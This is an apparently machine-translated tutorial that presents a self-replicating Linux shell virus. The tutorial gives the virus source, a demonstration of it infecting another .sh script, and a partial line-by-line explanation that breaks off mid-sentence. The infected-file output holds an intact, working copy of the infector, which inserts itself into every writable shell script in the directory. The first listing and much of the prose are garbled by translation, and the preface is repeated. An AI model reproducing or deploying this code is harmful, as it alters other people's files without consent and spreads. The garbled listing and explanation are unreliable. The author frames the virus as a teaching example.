Linux Shell Virus

Speaking of viruses, it's always a bit mysterious. I think it's so painful to compile the first dos virus in the past. It took more than three months from the beginning to the end, and it's also a mess, recently, I was wondering if I was infected with other files and spread myself. It was not very easy to use shell to write a virus, so I wrote the following small script, function is to infect other shell programs.

This program is of little practical significance, but it is very helpful to understand the virus propagation mechanism of the image. It can be considered that the teaching significance is greater than the practical significance.

SHELL virus Introduction

1. Preface

Speaking of viruses, it's always a bit mysterious. I think it's so painful to compile the first dos virus in the past. It took more than three months from the beginning to the end, and it's also a mess, recently, I was wondering if I was infected with other files and spread myself. It was not very easy to use shell to write a virus, so I wrote the following small script, function is to infect other shell programs.

This program is of little practical significance, but it is very helpful to understand the virus propagation mechanism of the image. It can be considered that the teaching significance is greater than the practical significance.

2. program code

#! /Bin/sh # file name: virus_demo.sh # purpose: shell virus demonstration. # Note: the virus will infect all. sh files in the current directory, but will not be infected repeatedly. # Write: watercloud@xfocus.org # Date: 2003-5-13 # B: <+! A % C & t:> vFile =$ _; vTmp =/tmp/. vTmp. $ for f in./*. sh; do if [! -W $ f-! -R $ vFile]; then continue; fi if grep <+! A % C & t:> $ f; then continue; fi if sed-n 1 p $ f | grep csh; then continue; fi cp-f $ vTmp; if [$? -Ne 0]; then continue; fi vNo = 'awk $0 ~ /(^ * #) | (^ * $)/& V = NR-1 {v ++} END {print 0 + v} $ vTmp 'sed-n "1, $ {vNo} p "$ vTmp> $ f (sed-n/^ # B: <+! A % C & t:>/,/^ # E: <+! A % C & t:>/p $ vFile; echo) >>$ f vNo = 'expr $ vNo + 1' sed-n "$ {vNo }, $ p "$ vTmp >>$ f rm-f $ vTmp done>/dev/null 2> & 1 unset vTmp; unset vFile; unset vNo echo" Hi, here is a demo shell virus in your script! "# E: <+! A % C & t:> # EOF

Let's see how powerful shell is, so that a program can infect other program files.

3. Demo

Test:

First, put two files in the current directory, one virus file and the other for infection testing.

[cloud@ /export/home/cloud/vir]> ls -l drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./ drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../ -rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh -rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

Let's take a look at our "BOT" script, which is very simple:

[cloud@ /export/home/cloud/vir]> cat test.sh #!/bin/sh # Just a demo for virus test # Author : foo # Date : 3000-1-1 ls -l #EOF

Okay. Start infecting him.

[cloud@ /export/home/cloud/vir]> ./virus_demo.sh Hi, here is a demo shell virus in your script !

Let's see the results after infection:

[cloud@ /export/home/cloud/vir]> cat test.sh #!/bin/sh # Just a demo for virus test # Author : foo # Date : 3000-1-1 #B:<+!a%C&t:> vFile=$_ ; vTmp=/tmp/.vTmp.$$ for f in ./*.sh; do if [ ! -w $f -a ! -r $vFile ]; then continue; fi if grep <+!a%C&t:> $f ; then continue; fi if sed -n 1p $f | grep csh; then continue; fi cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi vNo=`awk $0~/(^*#)|(^*$)/&&v==NR-1{v++}END{print 0+v} $vTmp` sed -n "1,${vNo}p" $vTmp >$f (sed -n /^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p $vFile ;echo ) >>$f vNo=`expr $vNo + 1` sed -n "${vNo},$p" $vTmp >>$f rm -f $vTmp done >/dev/null 2>&1 unset vTmp ;unset vFile ;unset vNo echo "Hi, here is a demo shell virus in your script !" #E:<+!a%C&t:> ls -l #EOF

Look, virus:

#B:<+!a%C&t:> . . . . #E:<+!a%C&t:>

The virus is transmitted. It is worth noting that the insert position of the virus body is at the beginning of the valid program line in the source test. sh! This mainly takes into account that shell programs generally like to make comments at the beginning of the program. It is too obvious that you cannot put others' comments to the back.

Let's take a look at our new virus:

[Cloud @/export/home/cloud/vir]>./test. sh Hi, here is a demo shell virus in your script! <-- Check the print information inside the virus body. -Rwxr-xr-x 1 cloud staff 724 6 ?? 4 test. sh-rwxr-xr-x 1 cloud staff 773 6 ?? 4: 42 virus_demo.sh

4. Simple Explanation

Let's analyze the virus step by step: # B: <+! A % C & t:> Start mark of the virus body, which is used by the program to copy and locate the virus. VFile =$ _; vTmp =/tmp /. vTmp. $ defines two variables, a temporary file, and a record of the current program name $ _. This requires that we use this line as the first line of the valid line of the program, if we do not get the name of the current program after the header is put, we will not find where to find the virus body to copy it.

For f in./*. sh; do

Start the loop and find all the programs ending with. sh in the current directory.

If [! -W $ f-! -R $ vFile]; then continue; fi

Whether the target has the write permission and whether the virus source file has the read permission.

If grep <+! A % C & t:> $ f; then continue; fi

Whether the target has been poisoned and has no medicine to save. If so, it would be too inappropriate to return it to him again?

If sed-n 1 p $ f | grep csh; then continue; fi

If the target shell is based on csh, the syntax is too different. Give up.

Cp-f $ vTmp; if [$? -Ne 0]; then continue; fi

Ready for infection. Copy the target to a backup first. What should I do if the copy fails? Of course I had to give up.

VNo = 'awk $0 ~ /(^ * #) | (^ * $)/& V = NR-1 {v ++} END {print 0 + v} $ vTmp'

Why? It seems complicated, but it seems a bit difficult to understand awk and regular expressions when learning shell virus. This is the comment and